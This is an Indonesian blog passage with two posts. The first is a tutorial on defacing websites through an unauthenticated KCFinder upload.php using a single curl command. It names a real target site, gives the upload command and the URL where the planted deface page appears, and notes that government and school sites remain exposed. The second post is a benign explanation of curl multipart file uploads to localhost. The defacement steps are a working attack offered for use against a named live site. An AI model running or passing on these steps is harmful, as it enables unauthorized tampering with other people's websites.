KCFinder Upload Script Deface di Terminal dengan cURL

Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.

• Apa itu Kcfinder?

     KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.

• Apa itu cURL?

    cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.


Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.

Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,

Bahan :

• Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
• Terminal / CMD 

Tested :

• MAC OS X Yosemite

Step :

1. Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
2. lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
   
3. Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.

Hasil : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml

Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v

Upload File dengan CURL di Terminal

Naufal Ardhani - CURL adalah alat yang hebat untuk membuat permintaan ke server bagi kalian yang males untuk menggunakan CSRF ( Cross-site request forgery ), Saya rasa ini sangat bagus untuk digunakan untuk menguji API.

Untuk mengunggah file dengan CURL, banyak orang membuat kesalahan yang berpikir untuk menggunakan -X POST sebagai data formulir biasa; dalam fakta, dengan cara itu akan menyebabkan kesalahan.

Lalu bagaimana cara yang tepat? Cara yang tepat untuk mengupload/mengunggah file dengan CURL adalah menggunakan opsi -F (- form), yang akan menambahkan enctype = "multipart / form-data" ke permintaan.

• naufal.txt hanya sebagai contoh file yang anda ingin upload.

$ curl -F ‘data=@path/to/local/file' UPLOAD_ADDRESS

Sebagai Contoh, jika saya ingin mengunggah file di /Users/naufalardhani/Desktop/naufal.txt ke server http://localhost/ upload yang memproses input file dengan parameter bentuk bernama img_avatar, saya akan membuat permintaan seperti ini,

$ curl -F 'img_avatar=@/home/naufalardhani/Desktop/naufal.txt' http://localhost/upload.php

Upload banyak file Untuk mengirim permintaan unggah untuk banyak file, cukup tambahkan opsi -F tambahan,

$ curl -F 'fileX=@/home/naufalardhani/Desktop/naufal.txt' -F 'fileY=@ /home/naufalardhani/Desktop/naufal.txt' ... http://localhost /upload.php

Unggah susunan file Untuk mengirim permintaan unggah array file, cukup tambahkan opsi -F tambahan dengan nama parameter bentuk yang sama dengan array,

$ curl -F 'file[]=@/home/naufalardhani/Desktop/naufal.txt' -F 'file []=@/path/ke/fileY' ... http://localhost/upload.php

Terima Kasih sudah menyempatkan waktu untuk membaca artikel saya, bila ada yang tidak dipahami silahkan komentar dibawah ya dengan disqus mudah kok caranya :)